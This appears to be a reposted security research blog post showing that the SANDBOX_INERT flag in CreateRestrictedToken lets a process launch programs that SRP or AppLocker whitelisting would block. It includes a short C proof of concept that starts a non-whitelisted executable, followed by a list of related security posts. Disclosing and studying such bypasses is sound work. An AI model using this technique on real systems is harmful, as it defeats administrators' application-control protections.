There’s an interesting comment on my Circumventing SRP and AppLocker, By Design post.
In my previous post, I showed a feature to circumvent SRP and AppLocker validation when a DLL is loaded.
The anonymous commenter points out a feature to create a new process, while circumventing SRP and AppLocker. Flag SANDBOX_INERT in function CreateRestrictedToken allows you to do this.
Per MSDN:
If this value is used, the system does not check AppLocker rules or apply Software Restriction Policies. For AppLocker, this flag disables checks for all four rule collections: Executable, Windows Installer, Script, and DLL.
When creating a setup program that must run extracted DLLs during installation, use the flag SAFER_TOKEN_MAKE_INERT in the SaferComputeTokenFromLevel function.
I wrote a small program to test this:
HANDLE hToken;
HANDLE hNewToken;
PROCESS_INFORMATION sPI;
STARTUPINFO sSI;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken))
{
if (CreateRestrictedToken(hToken, SANDBOX_INERT, 0, NULL, 0, NULL, 0, NULL, &hNewToken))
{
memset(&sSI, 0, sizeof(sSI));
sSI.cb = sizeof(sSI);
if (CreateProcessAsUser(hNewToken, L"c:\test\Dialog42.exe", NULL, NULL, NULL, TRUE, 0, NULL, NULL, &sSI, &sPI))
{
puts("process created");
}
}
This program starts another program, Dialog42.exe. I’ve configured SRP with a whitelist, Dialog42.exe is not whitelisted:
But when I use my program with the SANDBOX_INERT flag to start Dialog42.exe, it is allowed to run:
Full story: Didier Stevens
Related Posts
- Circumventing SRP and AppLocker, By Design
We’ve seen it countless times before. A vendor designs a security product, but punches a hole in this shield to accommodate developers. Yet, I still love the irony of it.
Software Restriction P... - Windows Process Regulator Adware Removal Instructions
The Emsisoft malware research team has discovered a new outbreak of the Windows Process Regulator adware. Emsisoft Anti-Malware detects this malware as Adware.Win32.WindowsProcessRegulator.
Win... - How to Design Security Warning Messages to Protect Users
Computer users are presented with a steady stream of security warnings, which are designed to help users avoid taking actions that put their systems and data at risk. Sometimes, a click on the OK butt... - DDoS Analysis Process, (Sat, Feb 12th)
Introduction:
We sometimes get requests from people who are undergoing Denial of Service attacks. These days that usually means a Distributed Denial of Service attack. In our role at the Internet St... - Dissecting the design of a mobile malware – Swapi.B
Mobile malware is no longer a new trend. We have been observing quite a few cases of different mobile threats for a while now.
In this blog, we wanted to show how a typical mobile trojan is designed... - Anti-cybercrime software mimics DNA matching process
A Scottish university spin-out has attracted £170,000 of funding to commercialise an anti-cybercrime software based on the same algorithms for DNA...
Source: Computer Crime Research News... - Russia to create ‘Windows rival’ (AFP)
AFP - The Russian state plans to revamp its computer services with a Windows rival to reduce its dependence on US giant Microsoft and better monitor computer security, a lawmaker said Wednesday.
Vi... - NWScript JIT engine: MSIL JIT backend overview and design goals
Yesterday, we examined the IR instruction raising process, at a high level. With a basic understanding of both how the IR is generated, and the IR design itself, we can begin to talk about the JIT ba... - “I’ve always referred to 2 main phases of the [malware reverse-engineering] process: behavioral…”
“I’ve always referred to 2 main phases of the [malware reverse-engineering] process: behavioral analysis and code analysis. It’s time to add a third major component: memory analysis.” - For an overvie... - Exploring Stuxnet’s PLC Infection Process
We first mentioned that W32.Stuxnet targets industrial control systems (ICSs) -- such as those used in pipelines or nuclear power plants -- 2 months ago in our blog here and gave some more technical d...
